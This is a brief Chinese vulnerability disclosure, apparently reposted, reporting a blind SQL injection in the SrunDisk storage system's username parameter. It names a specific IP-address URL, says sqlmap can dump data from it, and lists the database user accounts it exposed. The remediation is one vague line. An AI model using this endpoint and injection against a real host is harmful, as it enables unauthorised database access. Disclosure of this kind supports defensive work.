刚看看官网原来跟Srun3000另外一款Srundisk 系统 Url:http://218.75.75.92/user_space.php?username=admin
username参数过滤不严,直接单引号检测,直接跳转进入空间页面,但是都到Sqlmap可以直接跑数据。
database management system users [6]: [*] ''@'localhost' [*] 'aaa'@'%' [*] 'guest'@'%' [*] 'icc'@'%' [*] 'root'@'127.0.0.1' [*] 'root'@'localhost'修复方案:
过滤,好好检测下。
查看更多关于SrunDisk存储系统通用型盲注及修复 - 网站安全 -的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15521